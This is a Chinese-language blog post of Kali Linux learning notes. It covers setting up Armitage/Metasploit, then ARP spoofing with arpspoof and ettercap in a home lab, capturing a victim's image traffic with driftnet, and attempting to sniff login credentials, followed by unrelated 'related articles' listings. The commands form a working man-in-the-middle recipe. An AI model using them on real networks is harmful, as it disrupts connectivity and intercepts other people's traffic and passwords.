kail-linux 安全之旅
一些学习网站
http://xiao106347.blog.163.com/blog/static/2159920782013111995945233/ http://xiao106347.blog.163.com/blog/static/21599207820146302851904/ http://xiao106347.blog.163.com/blog/static/215992078201352055231824/
下载系统:http://www.cnblogs.com/CyLee/p/5726521.html
终端输入armitage,然后一直确认即可
出现异常尝试如下几个步骤
1、命令行输入service postgresql start(或者/etc/init.d/postgresql start)
2、找到图形界面把metasploit framework打开,会自动创建数据库,自动连接(或者尝试msfdb start + msfconsole,反正我是没用)
3、再次使用armitage
arpspoof攻击局域网(虚拟机攻击本机)
注意,必须将虚拟机网络设置为【桥接模式】
arpspoof -i 【我的网卡】 -t 【攻击目标ip】 【攻击目标默认网关】
【我的网卡】:虚拟机中打开终端,输入ifconfig查看,通常都是eth0;
【攻击目标ip】:本机中打开终端,输入ifconfg查看,我的是192.168.1.101,我是通过打开【网络适配器】查看的
【攻击目标默认网关ip】:本机中打开终端,输入ifconfg查看,通常是192.168.1.1,我是通过打开【网络适配器->高级->tcp/ip】查看的
然后在虚拟机输入此demo:
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
这样本机就无法访问网络了。按ctrl+c结束
获取局域网内攻击目标的图片
echo 1 >/proc/sys/net/ipv4/ip_forward #默认是0,通过这行修改为1,这种方式叫【ip转发】此时不会有断网现象了
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1 #这种方式叫【arp欺骗】
ettercap -i eth0 -Tq -M arp:remote /192.168.1.103// /192.168.1.1// #【arp欺骗】,如果上面的欺骗+截取没有效果,可以尝试使用这个
另开一个终端,使用如下命令截取图片流量。然后目标电脑打开任何带图片的网站如QQ空间
driftnet -i eth0 #浏览图片截取(本人MAC系统以及MAC系统上的虚拟机都无法使用该功能)
(ps:可以通过arp -a 来获取欺骗的成果,如果发现两个类型为【动态】的ip分别为目标和网关即可,mac电脑暂时无法看出是否被欺骗)
获取局域网内攻击目标的登录信息
也需要先arp欺骗+ip转发
ettercap -Tq -i eth0 #登录账号密码截取(暂时无法实现)
kail-linux 安全之旅的更多相关文章
- kail linux 虚拟机安装实录(一) 新建虚拟机
各位晚上好. 现在开始进行kail linux 在虚拟机上的安装. 我所使用的工具如下: kail linux 2.0 x64 http://mirrors.neusoft.edu.cn/kal ...
- 【Linux探索之旅】第二部分第二课:命令行,世界尽在掌握
内容简介 1.第二部分第二课:命令行,世界尽在掌握 2.第二部分第三课预告:文件和目录,组织不会亏待你 命令行,世界尽在掌握 今天的标题是不是有点霸气侧漏呢? 读者:“小编,你为什么每次都要起这么非主 ...
- 【Linux探索之旅】第一部分第五课:Unity桌面,人生若只如初见
内容简介 1.第一部分第五课:Unity桌面,人生若只如初见 2.第一部分第六课预告:Linux如何安装在虚拟机中 Unity桌面,人生若只如初见 不容易啊,经过了前几课的学习,我们认识了Linux是 ...
- 【Linux探索之旅】第二部分第五课:用户和权限,有权就任性
内容简单介绍 .第二部分第五课:用户和权限,有权就任性 2.第二部分第六课预告:Nano,刚開始学习的人的文本编辑器 用户和权限.有权就任性 今天的标题也挺任性的啊,虽说小编是一个非常本分的人(真的吗 ...
- Kail Linux的安装方法
众所周知,kail 是一个基于Debian的Linux发行版,它的目标就是为了在一个实用的工具包里尽可能多的包含渗透和审计工具 kail就实现了这个目标,里面包含有很多关于安全测试的开源工具,如果现在 ...
- kail linux虚拟机安装tools工具
因为自己比较懒,有时候自己不想打字需要粘贴就安装了虚拟机tools工具,又因为自己脑子不好使所以就写一下步骤,以便以后用得着.我这里用得是kail linux系统,不知道contest能不能这样安,下 ...
- 虚拟机14安装kail Linux
需要准备虚拟机和kail Linux镜像 1. 2.选择镜像安装,并且添加你的kail Linux镜像文件. 3. 4.在这里需要修改虚拟机名称,也可以不修改就用默认,然后在修改kail Linux的 ...
- MOOC Linux内核之旅小结【转】
转自:https://blog.csdn.net/titer1/article/details/45345123 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csd ...
- Linux内核之旅
http://www.kerneltravel.net/ Linux内核之旅 Linux Kernel Travel
- kail linux 系统下利用metaspolit工具渗透win7电脑
注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇 ...
随机推荐
- Delphi经验总结(3)
------------------------------------------------------- ◇删掉程序自己的exe文件 procedure TForm1.FormClose(Sen ...
- Spring MVC程序中得到静态资源文件css,js,图片
转载自:http://www.blogjava.net/fiele/archive/2014/08/24/417283.html 用 Spring MVC 开发应用程序,对于初学者有一个很头疼的问题, ...
- Android之SurfaceView
SurfaceView也是继承了View,但是我们并不需要去实现它的draw方法来绘制自己,为什么呢? 因为它和View有一个很大的区别,View在UI线程去更新自己:而SurfaceView则在一个 ...
- linux shell的切换
查看系统可用shell种类:(一般是bash shell) ➜ ~ chsh -l /bin/sh /bin/bash /sbin/nologin /bin/dash /bin/zsh 修改当前的sh ...
- mysql-关于Unix时间戳(unix_timestamp)
unix_timestamp时间戳是自 1970 年 1 月 1 日(00:00:00 GMT)以来的秒数.它也被称为 Unix 时间戳(Unix Timestamp). Unix时间戳(Unix t ...
- hdu 1012:u Calculate e(数学题,水题)
u Calculate e Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others)Tot ...
- 记VS2013并行编译导致出错的解决过程
接前一篇,电脑换了新的,系统是64bit的win8系统,先安装了SQLServer2012,再安装VS2010旗舰版,Stop!为什么还是2010?因为2010太经典了,以至于公司的项目还在用它写项目 ...
- Java Hour 36 Weathre ( 9 ) struts2 – exception
有句名言,叫做10000小时成为某一个领域的专家.姑且不辩论这句话是否正确,让我们到达10000小时的时候再回头来看吧. Hour 35 Exception Handling 直接添加全局性的异常处理 ...
- [译]SQL Server 之 查询计划缓存和重编译
查询优化是一个复杂而且耗时的操作,所以SQL Server需要重用现有的查询计划.查询计划的缓存和重用在多数情况下是有益的的,但是在某些特殊的情况下,重编译一个查询计划可能能够改善性能. SELECT ...
- js event 2
js event 2 浏览器兼容 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " ...